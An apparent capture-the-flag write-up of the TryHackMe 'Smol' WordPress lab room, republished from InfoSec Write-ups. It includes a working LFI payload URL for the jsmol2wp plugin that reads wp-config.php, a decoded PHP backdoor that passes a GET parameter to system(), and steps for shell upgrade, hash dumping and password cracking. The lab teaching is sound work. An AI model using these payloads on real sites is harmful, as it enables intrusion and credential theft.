TryHackMe Smol Writeup

بِسْمِ اللَّهِ الرَّحْمَنِ الرَّحِيمِ

Room link: https://tryhackme.com/r/room/smol

Room description:

At the heart of Smol is a WordPress website, a common target due to its extensive plugin ecosystem. The machine showcases a publicly known vulnerable plugin, highlighting the risks of neglecting software updates and security patches. Enhancing the learning experience, Smol introduces a backdoored plugin, emphasizing the significance of meticulous code inspection before integrating third-party components.
Quick Tips: Do you know that on computers without GPU like the AttackBox, John The Ripper is faster than Hashcat?

Start with an nmap scan.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -sV 10.10.187.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-26 05:49 EST
Nmap scan report for 10.10.187.53
Host is up (0.095s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.42 seconds

We have two ports:

ssh on 22/tcp
http on 80/tcp

Visited the site served at port 80.

Explored the site and came across a WordPress login page, we can come back to this later.

Used Whatweb to see what version of WordPress was running.

WordPress 6.4.3, from the description of the room it tells us that this CMS is has 2 vulnerable plugins so let’s run wpscan to find these plugins.

wpscan --url http://<the-url> --enumerate p

Found one called (jsmol2wp).

Now since we know what plugin it is let’s do some searching to see what's it vulnerable to. Stumbled across wpscan’s own website and searched for the mentioned plugin, vulnerable to LFI.

https://wpscan.com/vulnerability/ad01dad9-12ff-404f-8718-9ebbd67bf611/

PoC (Proof of Concept):

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

Replace localhost and the port with the name/Ip of the website (www.smol.thm in my case).

Found the config file, contains database credentials we can use to login to the previous wp login page.

Successfully logged in with the credentials and went to the dashboard, let’s look around for the second plugin.

Went to the pages tab on the left and stumbled upon this page called Webmaster Tasks, aha the “Hello Dolly” is the second plugin containing a backdoor, we can access it with the first vulnerable plugin with LFI.

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php

Came across a suspicious base64 encoded string, let’s decode it.

echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=" | base64 --decode

Result of the decode:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=" | base64 --decode

if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }
┌──(root㉿kali)-[/home/kali/Desktop]
└─# print "\143\155\x64"
cmd

┌──(root㉿kali)-[/home/kali/Desktop]
└─# print "\143\x6d\144"
cmd

This is proof that we can inject commands into the vulnerable page directly from this file (RCE). Here’s an example:

Time to get a shell.

Upgrade to a tty-shell.

python3 -c 'import pty; pty.spawn("/bin/sh")'

Got a shell but no access to any of the users in the home directory, we remember that we found database credentials in the config file so there must be a MySQL server running let’s try connecting to it.

Show databases; then use wordpress, then Show tables, then select * from wp_users;

We found some hashes, time to crack them using john.

Got the user.txt flag.

Time to escalate to get the root.txt flag.

Switched to the gege user and found on old wordpress zipped file but couldn’t access it due to permissions, switched to the next user think found the private ssh key, this is useful, copy it to your local machine and use it to login to the user think.

Checked and noticed that both users gege and think belong to the same group.

Switched to user gege to access his shell. Now we have access to the zipped wordpress file but it’s password protected, download the zipped file from the remote host to your local machine, i tired using scp to copy the file to my local machine but i had permission errors everywhere so i did this instead:

Then go to the remote host and scp the file to your machine.

Now it’s time to crack it, use zip2john to get the hash of the zipped file.

zip2john wordpress.old.zip
john wp_hash --wordlist=/usr/share/wordlists/rockyou.txt

Now we can unzip the file and see what’s inside, found a wp-config.php file cat the content for the file and you will get this. let’s login to the user xavi with his credentials.

Logged in and tried to get the root.txt flag but we need to escalate.

Ran sudo -l to see what xavi can run as sudo, all commands are allowed just did sudo su and got root.

Got the root.txt flag.

Finally Done, this room was actually challenging , Thank you!

My Linkedin

My tryhackme profile


TryHackMe Smol Writeup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

原始链接: https://infosecwriteups.com/tryhackme-smol-writeup-c43db13dee00?source=rss----7b722bfd1b8d---4
侵权请联系站方: [email protected]

相关推荐

换一批